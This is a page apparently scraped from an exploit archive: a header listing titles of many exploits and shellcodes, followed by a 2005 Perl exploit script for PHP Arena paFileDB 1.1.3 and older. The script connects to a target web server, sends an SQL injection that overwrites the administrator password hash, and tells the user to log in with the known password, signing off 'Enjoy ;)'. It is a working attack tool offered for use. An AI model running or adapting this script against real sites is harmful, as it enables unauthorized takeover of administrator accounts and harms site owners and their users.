
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
54 lines
No EOL
2.7 KiB
Perl
Executable file
54 lines
No EOL
2.7 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
######################################################################################
|
|
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m #
|
|
######################################################################################
|
|
# EXPLOIT FOR: PHP Arena paFileDB 1.1.3 And 0lder #
|
|
# #
|
|
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v) #
|
|
#Email: Alpha_Programmer@LinuxMail.ORG #
|
|
# #
|
|
# #
|
|
# + Discovered By: GulfTech #
|
|
# + Advisory: https://www.securityfocus.com/bid/13967 #
|
|
#Vulnerable: PHP Arena paFileDB 1.1.3 and Older #
|
|
######################################################################################
|
|
# GR33tz T0 ==> mh_p0rtal -- oil_Karchack -- Dr_CephaleX -- Str0ke #
|
|
#And Iranian Security & Hacking Groups: #
|
|
# #
|
|
# Crouz , Simorgh-ev , IHSsecurity , AlphaST , Shabgard & Emperor #
|
|
######################################################################################
|
|
|
|
use IO::Socket;
|
|
if (@ARGV < 2)
|
|
{
|
|
print "\n====================================================\n";
|
|
print " \n PHPArena Exploit By Alpha Programmer\n\n";
|
|
print " Trap-Set Underground Hacking Team \n\n";
|
|
print " Usage: <T4rg3t> <DIR>\n\n";
|
|
print "====================================================\n\n";
|
|
print "Examples:\n\n";
|
|
print " xpl.pl www.Site.com / \n";
|
|
exit();
|
|
}
|
|
|
|
my $host = $ARGV[0];
|
|
my $dir = $ARGV[1];
|
|
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
|
|
PeerPort => "80" );
|
|
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
|
|
print "\n\n[+] C0nn3cted\n";
|
|
$http = "pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20c15c493548d09ffd03c9d41d8bbbfeef%281337%28%20WHERE%201/*\n";
|
|
$http .= "Host: $host\n\r\n\r";
|
|
print "[+] Injecting SQL Commands ...\n";
|
|
sleep(1);
|
|
print "[+] Changing Admin's Password ...\n";
|
|
print $remote $http;
|
|
sleep(1);
|
|
while (<$remote>)
|
|
{
|
|
}
|
|
print "[+] Now , Login With This Password :\n";
|
|
print "Password : trapset\n\n";
|
|
print "Enjoy ;) \n\n";
|
|
|
|
# milw0rm.com [2005-06-15] |